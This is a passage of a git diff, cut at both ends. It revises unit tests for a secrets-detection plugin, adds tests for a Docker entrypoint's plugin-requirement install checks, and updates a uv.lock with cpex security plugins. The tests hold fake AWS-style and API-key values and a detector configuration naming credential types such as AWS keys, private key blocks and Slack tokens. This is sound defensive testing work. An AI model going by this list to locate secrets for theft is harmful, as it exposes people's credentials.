secrets scan finished" in record.message for record in caplog.records) - assert any("Pattern 'aws_access_key_id' matched" in record.message for record in caplog.records) - # Verify secret is not exposed in logs (use generic assertion to avoid exposing in failure message) - for record in caplog.records: - assert "AKIAFAKE12345EXAMPLE" not in record.message, "Secret value found in log record" - - -def test_rust_scan_fallback_logs_full_exception(monkeypatch, caplog): - """Fallback to Python should keep the Rust exception and traceback in logs.""" - # First-Party - from plugins.secrets_detection import secrets_detection as module - - secret = "AWS_ACCESS_KEY_ID=AKIAFAKE12345EXAMPLE" - - def boom(container, cfg): - raise RuntimeError("simulated rust failure") - - monkeypatch.setattr(module, "_RUST_AVAILABLE", True) - monkeypatch.setattr(module, "secrets_detection", boom) - caplog.set_level(logging.WARNING, logger=module.__name__) - - count, redacted, findings = module._scan_container(secret, module.SecretsDetectionConfig(), use_rust=True) - - assert count >= 1 - assert redacted == secret - assert findings - failure_logs = [record for record in caplog.records if "Rust scan failed, falling back to Python" in record.message] - assert failure_logs - assert failure_logs[0].exc_info is not None - assert "simulated rust failure" in caplog.text - - -@pytest.mark.parametrize( - "use_rust", - [ - pytest.param(False, id="python"), - pytest.param(True, marks=pytest.mark.skipif(not RUST_AVAILABLE, reason="Rust not available"), id="rust"), - ], -) -def test_generic_api_key_assignment_detection_is_opt_in(use_rust): - """Generic assignment-based API key detection should work when explicitly enabled.""" - # First-Party - from plugins.secrets_detection.secrets_detection import _scan_container, SecretsDetectionConfig - - config = SecretsDetectionConfig( - enabled={ - **SecretsDetectionConfig().enabled, - "generic_api_key_assignment": True, - } - ) - text = "X-API-Key: test12345678901234567890" # gitleaks:allow - - count, _redacted, findings = _scan_container(text, config, use_rust=use_rust) - - assert count >= 1 - assert any(f.get("type") == "generic_api_key_assignment" for f in findings) - - -@pytest.mark.parametrize( - "use_rust", - [ - pytest.param(False, id="python"), - pytest.param(True, marks=pytest.mark.skipif(not RUST_AVAILABLE, reason="Rust not available"), id="rust"), - ], -) -def test_generic_api_key_assignment_ignores_short_or_prose_values(use_rust): - """The broad API-key pattern should avoid matching short values or prose.""" - # First-Party - from plugins.secrets_detection.secrets_detection import _scan_container, SecretsDetectionConfig - - config = SecretsDetectionConfig( - enabled={ - **SecretsDetectionConfig().enabled, - "generic_api_key_assignment": True, - } - ) - - for text in [ - "api_key=short", - "api key rotation is enabled", - "The api_key field is documented below", - ]: - count, _redacted, findings = _scan_container(text, config, use_rust=use_rust) - assert not any(f.get("type") == "generic_api_key_assignment" for f in findings), text - if count: - assert all(f.get("type") != "generic_api_key_assignment" for f in findings) - - -def test_plugin_warns_when_broad_patterns_enabled(caplog): - """Enabling broad heuristic API-key patterns should emit an operator warning.""" - # First-Party - from plugins.secrets_detection.secrets_detection import SecretsDetectionPlugin - - caplog.set_level(logging.WARNING, logger="plugins.secrets_detection.secrets_detection") - SecretsDetectionPlugin( - PluginConfig( - name="secrets_detection", - kind="plugins.secrets_detection.secrets_detection.SecretsDetectionPlugin", - config={ - "enabled": { - "aws_access_key_id": True, - "aws_secret_access_key": True, - "google_api_key": True, - "generic_api_key_assignment": True, - "slack_token": True, - "private_key_block": True, - "jwt_like": False, - "hex_secret_32": False, - "base64_24": False, - } - }, - ) - ) - - assert "Broad secrets heuristics enabled" in caplog.text - assert "generic_api_key_assignment" in caplog.text + def test_generic_api_key_assignment_detection_is_opt_in(self): + count, _redacted, findings = py_scan_container("X-API-Key: test12345678901234567890", {"enabled": {"generic_api_key_assignment": True}}) + assert count >= 1 + assert any(f.get("type") == "generic_api_key_assignment" for f in findings) + + def test_generic_api_key_assignment_ignores_short_or_prose_values(self): + for text in ["api_key=short", "api key rotation is enabled", "The api_key field is documented below"]: + count, _redacted, findings = py_scan_container(text, {"enabled": {"generic_api_key_assignment": True}}) + assert not any(f.get("type") == "generic_api_key_assignment" for f in findings), text + if count: + assert all(f.get("type") != "generic_api_key_assignment" for f in findings) diff --git a/tests/unit/test_docker_entrypoint.py b/tests/unit/test_docker_entrypoint.py new file mode 100644 index 0000000000..30cbebe813 --- /dev/null +++ b/tests/unit/test_docker_entrypoint.py @@ -0,0 +1,145 @@ +"""Direct unit tests for docker-entrypoint.sh plugin requirement reload logic.""" + +from __future__ import annotations + +import stat +import subprocess +from pathlib import Path + +REPO_ROOT = Path(__file__).resolve().parents[2] +ENTRYPOINT = REPO_ROOT / "docker-entrypoint.sh" + + +def _write_executable(path: Path, content: str) -> None: + path.write_text(content, encoding="utf-8") + path.chmod(path.stat().st_mode | stat.S_IXUSR) + + +def _make_app_root(tmp_path: Path) -> Path: + app_root = tmp_path / "app" + (app_root / ".venv" / "bin").mkdir(parents=True) + (app_root / "plugins").mkdir() + return app_root + + +def _run_install_plugin_requirements(app_root: Path, requirements_path: Path | None = None) -> subprocess.CompletedProcess[str]: + command = f""" +set -euo pipefail +export CONTEXTFORGE_TEST_ONLY_SOURCE=true +export APP_ROOT="{app_root}" +source "{ENTRYPOINT}" +export RELOAD_PLUGIN_REQUIREMENTS_TXT=true +export PLUGIN_REQUIREMENTS_TXT_PATH="{requirements_path or app_root / 'plugins' / 'requirements.txt'}" +install_plugin_requirements +""" + return subprocess.run( + ["bash", "-lc", command], + capture_output=True, + text=True, + cwd=REPO_ROOT, + check=False, + ) + + +def test_install_plugin_requirements_refuses_path_outside_app_root(tmp_path: Path) -> None: + app_root = _make_app_root(tmp_path) + outside_requirements = tmp_path / "outside.txt" + outside_requirements.write_text("cpex-rate-limiter==0.0.3\n", encoding="utf-8") + + result = _run_install_plugin_requirements(app_root, outside_requirements) + + assert result.returncode == 1 + assert "must resolve under" in result.stdout + + +def test_install_plugin_requirements_refuses_missing_file(tmp_path: Path) -> None: + app_root = _make_app_root(tmp_path) + missing_requirements = app_root / "plugins" / "missing.txt" + + result = _run_install_plugin_requirements(app_root, missing_requirements) + + assert result.returncode == 1 + assert "not found" in result.stdout + + +def test_install_plugin_requirements_retries_three_times_then_fails(tmp_path: Path) -> None: + app_root = _make_app_root(tmp_path) + requirements = app_root / "plugins" / "requirements.txt" + requirements.write_text("cpex-rate-limiter==0.0.3\n", encoding="utf-8") + attempts_file = tmp_path / "attempts.txt" + _write_executable( + app_root / ".venv" / "bin" / "pip", + f"""#!/usr/bin/env bash +set -euo pipefail +echo attempt >> "{attempts_file}" +exit 1 +""", + ) + + result = _run_install_plugin_requirements(app_root, requirements) + + assert result.returncode == 1 + assert attempts_file.read_text(encoding="utf-8").count("attempt") == 3 + assert "failed after 3 attempts" in result.stdout + + +def test_install_plugin_requirements_succeeds_after_retry(tmp_path: Path) -> None: + app_root = _make_app_root(tmp_path) + requirements = app_root / "plugins" / "requirements.txt" + requirements.write_text("# comment\n\ncpex-rate-limiter==0.0.3\n", encoding="utf-8") + attempts_file = tmp_path / "attempts.txt" + _write_executable( + app_root / ".venv" / "bin" / "pip", + f"""#!/usr/bin/env bash +set -euo pipefail +count=0 +if [[ -f "{attempts_file}" ]]; then + count=$(wc -l < "{attempts_file}") +fi +echo attempt >> "{attempts_file}" +if [[ "$count" -lt 1 ]]; then + exit 1 +fi +exit 0 +""", + ) + + result = _run_install_plugin_requirements(app_root, requirements) + + assert result.returncode == 0 + assert attempts_file.read_text(encoding="utf-8").count("attempt") == 2 + assert "Installing 1 plugin package requirement" in result.stdout + assert "attempt 1/3 failed" in result.stdout + + +def test_install_plugin_requirements_skips_when_reload_disabled(tmp_path: Path) -> None: + app_root = _make_app_root(tmp_path) + marker = tmp_path / "pip-called.txt" + _write_executable( + app_root / ".venv" / "bin" / "pip", + f"""#!/usr/bin/env bash +set -euo pipefail +echo called > "{marker}" +exit 0 +""", + ) + command = f""" +set -euo pipefail +export CONTEXTFORGE_TEST_ONLY_SOURCE=true +export APP_ROOT="{app_root}" +source "{ENTRYPOINT}" +export RELOAD_PLUGIN_REQUIREMENTS_TXT=false +install_plugin_requirements +""" + + result = subprocess.run( + ["bash", "-lc", command], + capture_output=True, + text=True, + cwd=REPO_ROOT, + check=False, + ) + + assert result.returncode == 0 + assert not marker.exists() + assert result.stdout == "" diff --git a/tests/unit/test_rust_plugins_workflow.py b/tests/unit/test_go_toolchain_pinning.py similarity index 51% rename from tests/unit/test_rust_plugins_workflow.py rename to tests/unit/test_go_toolchain_pinning.py index d03ba0f9d0..47ddf55433 100644 --- a/tests/unit/test_rust_plugins_workflow.py +++ b/tests/unit/test_go_toolchain_pinning.py @@ -1,44 +1,18 @@ +# Standard from pathlib import Path +# Third-Party import yaml -WORKFLOW_PATH = Path(__file__).resolve().parents[2] / ".github" / "workflows" / "rust-plugins.yml" LINTING_WORKFLOW_PATH = Path(__file__).resolve().parents[2] / ".github" / "workflows" / "linting-full.yml" MAKEFILE_PATH = Path(__file__).resolve().parents[2] / "Makefile" -def load_workflow() -> dict: - with WORKFLOW_PATH.open(encoding="utf-8") as handle: - return yaml.safe_load(handle) - - def load_linting_workflow() -> dict: with LINTING_WORKFLOW_PATH.open(encoding="utf-8") as handle: return yaml.safe_load(handle) -def test_build_wheels_artifacts_are_unique_per_platform(): - workflow = load_workflow() - build_wheels_job = workflow["jobs"]["build-wheels"] - - upload_step = next(step for step in build_wheels_job["steps"] if step.get("name") == "Upload wheels as artifacts") - - assert upload_step["with"]["name"] == "wheels-build-${{ matrix.os }}" - - -def test_rust_ci_compiles_benchmarks_without_running_them(): - workflow = load_workflow() - jobs = workflow["jobs"] - - assert "benchmark-tests" not in jobs - - release_build_job = jobs["release-build-verification"] - assert release_build_job["name"] == "Benchmark Build Verification" - - build_step = next(step for step in release_build_job["steps"] if step.get("name") == "Compile Rust plugin benchmarks without running them") - assert build_step["run"] == "make rust-bench-build" - - def test_linting_full_uses_patched_go_and_module_cache_paths(): workflow = load_linting_workflow() steps = workflow["jobs"]["linting-full"]["steps"] diff --git a/uv.lock b/uv.lock index 81d8cd3c37..aad13483fb 100644 --- a/uv.lock +++ b/uv.lock @@ -8,13 +8,16 @@ resolution-markers = [ ] [options] -exclude-newer = "2026-03-18T10:14:46.203156Z" +exclude-newer = "2026-03-31T07:02:41.860141Z" exclude-newer-span = "P10D" [options.exclude-newer-package] -langchain-openai = "2026-03-23T18:59:20Z" -requests = "2026-03-25T15:10:42Z" -langchain-core = "2026-03-24T18:48:45Z" +cpex-pii-filter = "2026-04-09T23:59:59Z" +cpex-secrets-detection = "2026-04-09T23:59:59Z" +cpex-rate-limiter = "2026-04-09T23:59:59Z" +cpex-url-reputation = "2026-04-09T23:59:59Z" +cpex-retry-with-backoff = "2026-04-09T23:59:59Z" +cpex-encoded-exfil-detection = "2026-04-09T23:59:59Z" [[package]] name = "a2a-sdk" @@ -138,15 +141,6 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/00/b7/e3bf5133d697a08128598c8d0abc5e16377b51465a33756de24fa7dee953/aiosqlite-0.22.1-py3-none-any.whl", hash = "sha256:21c002eb13823fad740196c5a2e9d8e62f6243bd9e7e4a1f87fb5e44ecb4fceb", size = 17405, upload-time = "2025-12-23T19:25:42.139Z" }, ] -[[package]] -name = "alabaster" -version = "1.0.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/a6/f8/d9c74d0daf3f742840fd818d69cfae176fa332022fd44e3469487d5a9420/alabaster-1.0.0.tar.gz", hash = "sha256:c00dca57bca26fa62a6d7d0a9fcce65f3e026e9bfe33e9c538fd3fbb2144fd9e", size = 24210, upload-time = "2024-07-26T18:15:03.762Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/7e/b3/6b4067be973ae96ba0d615946e314c5ae35f9f993eca561b356540bb0c2b/alabaster-1.0.0-py3-none-any.whl", hash = "sha256:fc6786402dc3fcb2de3cabd5fe455a2db534b371124f1f21de8731783dec828b", size = 13929, upload-time = "2024-07-26T18:15:02.05Z" }, -] - [[package]] name = "alembic" version = "1.18.4" @@ -326,15 +320,6 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/da/21/26f1680ec3a598ea31768f9ebcd427e42986d077a005416094b580635532/autoflake-2.3.3-py3-none-any.whl", hash = "sha256:a51a3412aff16135ee5b3ec25922459fef10c1f23ce6d6c4977188df859e8b53", size = 17715, upload-time = "2026-02-20T05:01:42.137Z" }, ] -[[package]] -name = "babel" -version = "2.18.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/7d/b2/51899539b6ceeeb420d40ed3cd4b7a40519404f9baf3d4ac99dc413a834b/babel-2.18.0.tar.gz", hash = "sha256:b80b99a14bd085fcacfa15c9165f651fbb3406e66cc603abf11c5750937c992d", size = 9959554, upload-time = "2026-02-01T12:30:56.078Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/77/f5/21d2de20e8b8b0408f0681956ca2c69f1320a3848ac50e6e7f39c6159675/babel-2.18.0-py3-none-any.whl", hash = "sha256:e2b422b277c2b9a9630c1d7903c2a00d0830c409c59ac8cae9081c92f1aeba35", size = 10196845, upload-time = "2026-02-01T12:30:53.445Z" }, -] - [[package]] name = "backports-tarfile" version = "1.2.0" @@ -853,6 +838,99 @@ toml = [ { name = "tomli", marker = "python_full_version <= '3.11'" }, ] +[[package]] +name = "cpex-encoded-exfil-detection" +version = "0.2.0" +source = { registry = "https://pypi.org/simple" } +dependencies = [ + { name = "pydantic" }, +] +sdist = { url = "https://files.pythonhosted.org/packages/8b/24/d186169c1085f40af62852fadbe3c060a959ed5ad7e5ba00b3ac97c2db28/cpex_encoded_exfil_detection-0.2.0.tar.gz", hash = "sha256:b5c6e33bdddb5ccdf1c331040649fa2b2ea2373383042091c0f95299df1c6b58", size = 64296, upload-time = "2026-04-09T13:48:02.089Z" } +wheels = [ + { url = "https://files.pythonhosted.org/packages/3e/5d/1e4a55c7bd78a62b89341a00510f2a56f8915912fb4b240f2b356d3f1361/cpex_encoded_exfil_detection-0.2.0-cp311-abi3-macosx_11_0_arm64.whl", hash = "sha256:5511d0b403ba6d4014cb137fe7b83507959042fdfcb0b0b73119908c1a9b3901", size = 753563, upload-time = "2026-04-09T13:47:52.81Z" }, + { url = "https://files.pythonhosted.org/packages/19/f9/41f86b8e9eeae36a6474ddb90ebf3955cae76a41335f403fc3bb2191e4af/cpex_encoded_exfil_detection-0.2.0-cp311-abi3-manylinux_2_34_aarch64.whl", hash = "sha256:d5912467a9a51738e74e78cde39a33961bb3a68884195c91dbb8a820d3bf61e6", size = 794176, upload-time = "2026-04-09T13:47:54.564Z" }, + { url = "https://files.pythonhosted.org/packages/b0/0e/72a4b2a1c58cea7aec50fcc43882d92fce34cf06df19abb977fd08035146/cpex_encoded_exfil_detection-0.2.0-cp311-abi3-manylinux_2_34_ppc64le.whl", hash = "sha256:8d9d24a4861120612e5b1a0cd4ed1a408d4d203e03caee15cdceb9e37cdd62da", size = 880031, upload-time = "2026-04-09T13:47:56.084Z" }, + { url = "https://files.pythonhosted.org/packages/65/33/974494234b94a784d10936ed1e66c7c04fa8ac5347dd6c12fe15de563858/cpex_encoded_exfil_detection-0.2.0-cp311-abi3-manylinux_2_34_s390x.whl", hash = "sha256:ffb64b239e472d12d7c9eec95b5c39d650d009f1ae965b73e20df30917244dbc", size = 897589, upload-time = "2026-04-09T13:47:57.672Z" }, + { url = "https://files.pythonhosted.org/packages/6b/63/355ec76b4c112233e2661f1955d2acfde3e6dfa8626f1dcbcd98bf919281/cpex_encoded_exfil_detection-0.2.0-cp311-abi3-manylinux_2_34_x86_64.whl", hash = "sha256:3845a368875da7e65f312e6359af2942ff1fb8af325a1227a2573a6a91b3890f", size = 856605, upload-time = "2026-04-09T13:47:59.262Z" }, + { url = "https://files.pythonhosted.org/packages/ba/b1/c0dcbdf1ab1b94e4907c75cdf392e74ab95e677abb29e5cbad283bead176/cpex_encoded_exfil_detection-0.2.0-cp311-abi3-win_amd64.whl", hash = "sha256:a70ae294cfa64dcbf0b6f54412bafb6964dcc887e5684426f0eaeefe22408b95", size = 779979, upload-time = "2026-04-09T13:48:00.512Z" }, +] + +[[package]] +name = "cpex-pii-filter" +version = "0.2.0" +source = { registry = "https://pypi.org/simple" } +sdist = { url = "https://files.pythonhosted.org/packages/4c/39/0d2413537c6ba52eff1c51e9746b59d93fc8cc9149c9569666f658fec59a/cpex_pii_filter-0.2.0.tar.gz", hash = "sha256:e9e004fe7bb30ed0b91bfd24ec76cc37df5ebeca7abd2a3d3c1e1218e1a864e2", size = 58009, upload-time = "2026-04-03T14:33:18.42Z" } +wheels = [ + { url = "https://files.pythonhosted.org/packages/9b/b0/96d254f77fc3c52f4eff5a3e160a77b12280f665d526e1537bf27aba3b26/cpex_pii_filter-0.2.0-cp311-abi3-macosx_11_0_arm64.whl", hash = "sha256:1cd21889ebec41d5bb8081496457c55771543cd644f7ab4c06b96c6625e9ff3a", size = 805011, upload-time = "2026-04-03T14:33:13.319Z" }, + { url = "https://files.pythonhosted.org/packages/d9/84/31487a81be14123113b7d6170e37da0915aecab904bc4529d6e9a77550a4/cpex_pii_filter-0.2.0-cp311-abi3-manylinux_2_34_aarch64.whl", hash = "sha256:4eeade33884053a7b8a3f527f48d713e1e4a54faa5e9021dcf69231fb6957d90", size = 847351, upload-time = "2026-04-07T08:24:20.993Z" }, + { url = "https://files.pythonhosted.org/packages/e1/96/0604ebbc19835a0b8dadf85e890c9feabf9bb8cf5e6f5b6f70ba5c3ff3fe/cpex_pii_filter-0.2.0-cp311-abi3-manylinux_2_34_ppc64le.whl", hash = "sha256:e2ac55be93b60248b6669882f58df2a1f466f4c6371739ed39a615ea2dd7cdfd", size = 945821, upload-time = "2026-04-07T08:24:22.68Z" }, + { url = "https://files.pythonhosted.org/packages/8b/e0/a020e8bf52db114ad500d150f89f5843edf1e0e7306c00d658f9071de862/cpex_pii_filter-0.2.0-cp311-abi3-manylinux_2_34_s390x.whl", hash = "sha256:5ecdeec96eae1d2bb8a5c1e5f4f18c30e818aad692ad4c6b03875cb19c660235", size = 960870, upload-time = "2026-04-07T08:24:24.318Z" }, + { url = "https://files.pythonhosted.org/packages/93/aa/494adca465038729c3644ce74259bffa997cf9ec2be924cd2639e4813968/cpex_pii_filter-0.2.0-cp311-abi3-manylinux_2_34_x86_64.whl", hash = "sha256:e4e93ece0dee4832a5240cfdf7ce96242f02fd2f10fc299d0a640bf98ffd7d70", size = 914156, upload-time = "2026-04-03T14:33:15.11Z" }, + { url = "https://files.pythonhosted.org/packages/4c/e6/eec077e39de80024b7cd00876b11e8eebe66533f80c44c9d5cf26172c40d/cpex_pii_filter-0.2.0-cp311-abi3-win_amd64.whl", hash = "sha256:d649490dbd48852298522f749a19c7bc2519f35f1be432d0a29be8ccaf0c841f", size = 842585, upload-time = "2026-04-03T14:33:16.858Z" }, +] + +[[package]] +name = "cpex-rate-limiter" +version = "0.0.3" +source = { registry = "https://pypi.org/simple" } +sdist = { url = "https://files.pythonhosted.org/packages/1a/d5/db5a693ddbfab73770f71d20b6bb78fb5d5625effef81728069194eaa842/cpex_rate_limiter-0.0.3.tar.gz", hash = "sha256:c2bc35530840bdc98c70a8cb8a12290dc765e757f54e2961644bc6eda4ca99f1", size = 63839, upload-time = "2026-04-07T08:51:13.149Z" } +wheels = [ + { url = "https://files.pythonhosted.org/packages/d4/9c/a354b5a9d2d34f72b4aa9a5ad8a9ea32f9811116fb98d9e8f2178465f63f/cpex_rate_limiter-0.0.3-cp311-abi3-macosx_11_0_arm64.whl", hash = "sha256:6ce22f0edaa79687a98fb9ffbce30fe8b147cf931f110de04acd4c3d4a867217", size = 702981, upload-time = "2026-04-07T08:51:04.429Z" }, + { url = "https://files.pythonhosted.org/packages/80/aa/f93985195352d90f40ef57458c2cdd897b1b42b0dae910483bf9b1d76b78/cpex_rate_limiter-0.0.3-cp311-abi3-manylinux_2_34_aarch64.whl", hash = "sha256:b6cab31c59eb24c433d56694935be8918916b74513904e3de77e1610c90bf93b", size = 731483, upload-time = "2026-04-07T08:51:06.139Z" }, + { url = "https://files.pythonhosted.org/packages/37/90/5c01ce2499a43f9f356e102723e13672a6e591c0015b9fb26c2f7dd5467a/cpex_rate_limiter-0.0.3-cp311-abi3-manylinux_2_34_ppc64le.whl", hash = "sha256:f98674f7b609ef107e4129a110d20ae942ecd29fa8dbad39f92fda4ec9ba2271", size = 832663, upload-time = "2026-04-07T08:51:07.778Z" }, + { url = "https://files.pythonhosted.org/packages/eb/b2/fab0c09600dacfca1b0d86e24d1d219527480d82cf8e2e7268ed06cf22b0/cpex_rate_limiter-0.0.3-cp311-abi3-manylinux_2_34_s390x.whl", hash = "sha256:a6f703e5170908c2801ba8641161ad1be454e73a652ce8ee555f56af83418637", size = 851711, upload-time = "2026-04-07T08:51:09.044Z" }, + { url = "https://files.pythonhosted.org/packages/5a/b7/e5509dbbfcf8f60d5a4062e78f0bf82f60548787ceede7bc5a272aee34ec/cpex_rate_limiter-0.0.3-cp311-abi3-manylinux_2_34_x86_64.whl", hash = "sha256:d45de2e6f6f8b3cbd0291f5ce81e950846d31751b11d02567dd3c553a771919e", size = 771196, upload-time = "2026-04-07T08:51:10.299Z" }, + { url = "https://files.pythonhosted.org/packages/f2/e7/77a83a27bf681e2abc3b76edacbc379c61d7994b02d436d2b0bfd36003c8/cpex_rate_limiter-0.0.3-cp311-abi3-win_amd64.whl", hash = "sha256:876df5158f8f5d1c29fc6a7a41c775a4f510ddf3c56f24bc05a15297705b4bd3", size = 735138, upload-time = "2026-04-07T08:51:11.654Z" }, +] + +[[package]] +name = "cpex-retry-with-backoff" +version = "0.1.0" +source = { registry = "https://pypi.org/simple" } +dependencies = [ + { name = "pydantic" }, +] +sdist = { url = "https://files.pythonhosted.org/packages/21/88/a75b3197452c1a35aa21b1e8941872b5242c4e44b5e39d959a0f94ce5cbf/cpex_retry_with_backoff-0.1.0.tar.gz", hash = "sha256:07c08434763652ee4724655ea86a21dfee620c33ae6930f336ac21ded23d94af", size = 40535, upload-time = "2026-04-09T10:36:47.611Z" } +wheels = [ + { url = "https://files.pythonhosted.org/packages/a3/08/78755fd66b1e8feffab88a10ff2573b0e6fabe9fdab6bddfeadd65f04f48/cpex_retry_with_backoff-0.1.0-cp311-abi3-macosx_11_0_arm64.whl", hash = "sha256:e385ca211c0c577803bdd0615881419c2dc8b77d44145c4d1d1b0c5901ca6b69", size = 253541, upload-time = "2026-04-09T10:36:39.839Z" }, + { url = "https://files.pythonhosted.org/packages/8a/65/7721a10403a86d7dae34efa069b44e4a86c734b477045db9ba05f109d617/cpex_retry_with_backoff-0.1.0-cp311-abi3-manylinux_2_34_aarch64.whl", hash = "sha256:960644654080289daf1806df0772362970efe3c0261eb5b5a2edf5d7d851ea2e", size = 268874, upload-time = "2026-04-09T10:36:41.201Z" }, + { url = "https://files.pythonhosted.org/packages/c1/43/882d21832d24aa5d98500a58c85c47a9a6533ccb1c55625f01c96bffded9/cpex_retry_with_backoff-0.1.0-cp311-abi3-manylinux_2_34_ppc64le.whl", hash = "sha256:7310fa9fcaf39c27452b2c8c9728fec1961ca41206f911a3cb67d3f622ca5687", size = 311341, upload-time = "2026-04-09T10:36:42.406Z" }, + { url = "https://files.pythonhosted.org/packages/26/ea/fb124adb9bbe94078402e5878a8761a31090faecf43afa49881d52da91db/cpex_retry_with_backoff-0.1.0-cp311-abi3-manylinux_2_34_s390x.whl", hash = "sha256:be313878933f0569ce637776353a5a52b8d6779c68cacc67b32d5b616c4c48b5", size = 319780, upload-time = "2026-04-09T10:36:43.922Z" }, + { url = "https://files.pythonhosted.org/packages/e4/79/adf91d4d9efe2d0765af90d36c0e5ae99854135db06d38f58883d1e664bf/cpex_retry_with_backoff-0.1.0-cp311-abi3-manylinux_2_34_x86_64.whl", hash = "sha256:b70a7232c507fe312cf3b703ebf92b3801c16a637a4635dc06da6f1251165ee3", size = 278260, upload-time = "2026-04-09T10:36:45.168Z" }, + { url = "https://files.pythonhosted.org/packages/24/af/7f13fdd6df0a68272675feb092db3bd1eda8ede9d3558824d94022acc2c2/cpex_retry_with_backoff-0.1.0-cp311-abi3-win_amd64.whl", hash = "sha256:0ece79a620012377df10057fbf8182a062349353ce37082d1922891422ffb759", size = 190262, upload-time = "2026-04-09T10:36:46.454Z" }, +] + +[[package]] +name = "cpex-secrets-detection" +version = "0.1.0" +source = { registry = "https://pypi.org/simple" } +sdist = { url = "https://files.pythonhosted.org/packages/59/e6/9bbedb5e2ebe74cf78124b6de710600d4b0fb15bd8b23c663833a4d9132f/cpex_secrets_detection-0.1.0.tar.gz", hash = "sha256:d2a12762f80bba8b4d4afbafb0850a9fa337b3a478a98a96d7ba2266913a1025", size = 31884, upload-time = "2026-04-09T14:03:15.81Z" } +wheels = [ + { url = "https://files.pythonhosted.org/packages/b2/4d/e0a749db3bb40634a509363290167f14931631551f29d25fc93b4a5253f6/cpex_secrets_detection-0.1.0-cp311-abi3-macosx_11_0_arm64.whl", hash = "sha256:55287a02d8ec4a31bdf5aa9d4e46dc93572b42a0090ead42664779fe67bc2940", size = 716178, upload-time = "2026-04-09T14:03:07.019Z" }, + { url = "https://files.pythonhosted.org/packages/e3/c2/2e62e95f31d1585a534ffff26227b79137ad0da6bfc02d4a6ee5666206ac/cpex_secrets_detection-0.1.0-cp311-abi3-manylinux_2_34_aarch64.whl", hash = "sha256:bad46b1602b8c476604edbe4eb42101fd5564de2395d9a6595dbba54eb7ad222", size = 759669, upload-time = "2026-04-09T14:03:08.735Z" }, + { url = "https://files.pythonhosted.org/packages/49/a7/ca20b6dfd91c7af810b10e91573e69f31dbe0737c6cbfb259b15a527e487/cpex_secrets_detection-0.1.0-cp311-abi3-manylinux_2_34_ppc64le.whl", hash = "sha256:2527cc33f28eb4449d092e2434855b2a95309f11de48de57b148123af1d4b118", size = 836068, upload-time = "2026-04-09T14:03:10.084Z" }, + { url = "https://files.pythonhosted.org/packages/3e/34/1c14de69e7dd68c5638fb5ca0734a4ebc7bccc98ec4ff9390b03f8fd4185/cpex_secrets_detection-0.1.0-cp311-abi3-manylinux_2_34_s390x.whl", hash = "sha256:edf9ff439b28f43543c5a12b23b34c33cf7c408b1aba9733f146eb6347b201d5", size = 856437, upload-time = "2026-04-09T14:03:11.769Z" }, + { url = "https://files.pythonhosted.org/packages/b9/b0/0b348d27b4eda710d0e5d9ce41e7d1e47c106d5e54e547df64487410105a/cpex_secrets_detection-0.1.0-cp311-abi3-manylinux_2_34_x86_64.whl", hash = "sha256:4572a70bd0dd192c4acd7515ae793b0d81a31f58f9510e7218ee75539ee1baac", size = 815021, upload-time = "2026-04-09T14:03:13.128Z" }, + { url = "https://files.pythonhosted.org/packages/f3/65/3e68f346860c14d66b551937955364920b42260597af17275de3d3786220/cpex_secrets_detection-0.1.0-cp311-abi3-win_amd64.whl", hash = "sha256:f1046587fffa4af2b1b4b0fba60f95f0a0a1988064c7f838261a28433b71ceb6", size = 735923, upload-time = "2026-04-09T14:03:14.452Z" }, +] + +[[package]] +name = "cpex-url-reputation" +version = "0.1.1" +source = { registry = "https://pypi.org/simple" } +dependencies = [ + { name = "pydantic" }, +] +sdist = { url = "https://files.pythonhosted.org/packages/fe/10/7826762608bfe73cb7166b9c2b8a0e108ea7eaeee3e8558af9c701861da3/cpex_url_reputation-0.1.1.tar.gz", hash = "sha256:6eaf01cfb4d8b2a511e6b8e79bc8d12aedc02f2dda94b42c3b9d8070e7b3f461", size = 38800, upload-time = "2026-04-09T14:13:42.997Z" } +wheels = [ + { url = "https://files.pythonhosted.org/packages/a2/60/72783e07ce7a8ec3adcca0ff8b294f7c14755607755971e18c120105f75c/cpex_url_reputation-0.1.1-cp311-abi3-macosx_11_0_arm64.whl", hash = "sha256:ac3ad2b0b1c992f061898475449f6780a298ab2fcc59149ce3f65613afc43f73", size = 170737, upload-time = "2026-04-09T14:13:34.631Z" }, + { url = "https://files.pythonhosted.org/packages/73/42/70edae434946c44aab9a587de0ac951a344555d6373291f882adb6e4f955/cpex_url_reputation-0.1.1-cp311-abi3-manylinux_2_34_aarch64.whl", hash = "sha256:024c1ce4d0c1898799891e46e7b1485cd811ee93b607f9d6d42e8b63620c4fc4", size = 183418, upload-time = "2026-04-09T14:13:35.935Z" }, + { url = "https://files.pythonhosted.org/packages/fe/39/babbe46352c5bcb40bd02eb5e4f89ef830b5e784dfe8f5cef0bcc66bd503/cpex_url_reputation-0.1.1-cp311-abi3-manylinux_2_34_ppc64le.whl", hash = "sha256:cf8180b3cec0aa57997fd7cef41efa575c2be49172e308d6efe7e2f031f60b2f", size = 212228, upload-time = "2026-04-09T14:13:37.302Z" }, + { url = "https://files.pythonhosted.org/packages/fc/cc/49f5f522e19ba57ae1922286c6e7d1ebb02d07a11d8660f6509256ef1b5a/cpex_url_reputation-0.1.1-cp311-abi3-manylinux_2_34_s390x.whl", hash = "sha256:c580cca81920d0a1c2e41d74c26a486e7347bdacdb220b603e6029714d37d777", size = 219026, upload-time = "2026-04-09T14:13:38.773Z" }, + { url = "https://files.pythonhosted.org/packages/55/b2/74835033f839ba70b8f8bf2a14f47714876b8b985aad17e64ac31bbb9640/cpex_url_reputation-0.1.1-cp311-abi3-manylinux_2_34_x86_64.whl", hash = "sha256:34896493b4a23e0439d30d4055423b669f7b03262d393aef9f129b287697ac43", size = 189958, upload-time = "2026-04-09T14:13:40.174Z" }, + { url = "https://files.pythonhosted.org/packages/4d/a9/7b49b8d736aafa835f870dc720c474db3cdd6793b3f6a8048df1701bffc3/cpex_url_reputation-0.1.1-cp311-abi3-win_amd64.whl", hash = "sha256:d6f74f768da503d0b83591402507cf12bceb4cc000e2bb56a2e3df6439fdfd04", size = 95251, upload-time = "2026-04-09T14:13:41.499Z" }, +] + [[package]] name = "cryptography" version = "46.0.5" @@ -1022,22 +1100,6 @@ wheels = [ { url = 